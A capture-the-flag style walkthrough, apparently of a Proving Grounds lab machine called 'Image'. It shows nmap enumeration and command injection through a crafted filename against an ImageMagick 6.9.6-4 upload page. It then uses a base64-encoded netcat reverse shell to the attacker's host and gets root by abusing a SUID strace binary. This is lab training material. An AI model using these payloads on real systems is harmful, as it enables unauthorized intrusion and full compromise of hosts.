root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

First Enumeration with nmap

# Nmap 7.94SVN scan initiated Mon Feb 19 11:40:13 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 80,22 -Pn 192.168.239.178
Nmap scan report for 192.168.239.178
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: ImageMagick Identifier
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 19 11:40:27 2024 -- 1 IP address (1 host up) scanned in 14.60 seconds

image

a web server is running on port 80, checking it on a browser we got an Imagemagick identifier.

image

uploaded an image file and we can see the version of this service running is 6.9.6-4.

image

searching for exploit on this service, we can see there’s an RCE vuln present read about exploit.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ cp ~/Pictures/1.png .
                                                                                                                                                            
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ cp 1.png '|1"`ping 192.168.45.212`".png'

modify the name of an image and inject an arbitary code to ping our host.

image

upload the modified image.

image

we got a ping back, let’s spawn a reverse shell.

#base64 encode payload
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.212 80 >/tmp/f

cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y=

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ cp 1.png '|1"`echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y= | base64 -d|bash`".png'

first we base64 encode the reverse shell payload. fire up ncat listener

image

Uploaded the image.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ ncat -lnvp 80                                                
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 192.168.239.178:55626.
sh: 0: can't access tty; job control turned off
$ whoami 
www-data
$

check back listener and we got a reverse shell as www-data.

Privilege Escalation

www-data@image:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/strace
/usr/bin/fusermount                                                           
/usr/bin/sudo               
/usr/bin/su                      
/usr/bin/umount                                                               
/usr/bin/passwd            
/usr/bin/chsh                 
/usr/bin/chfn                 
/usr/bin/at                      
/usr/bin/mount                 
/usr/bin/newgrp                 
/usr/bin/gpasswd                
/usr/bin/pkexec             
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign    
/usr/lib/eject/dmcrypt-get-device

loocking for suid, we got an suid /usr/bin/strace. let’s abuse this.

image

found abuse commands in gtfobins

www-data@image:/var/www/html$ /usr/bin/strace -o /dev/null /bin/bash -p 
bash-5.0# whoami 
root
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0#

abused the suid binary and we got a root shell.

image

and we are through. 🙂 easy yeah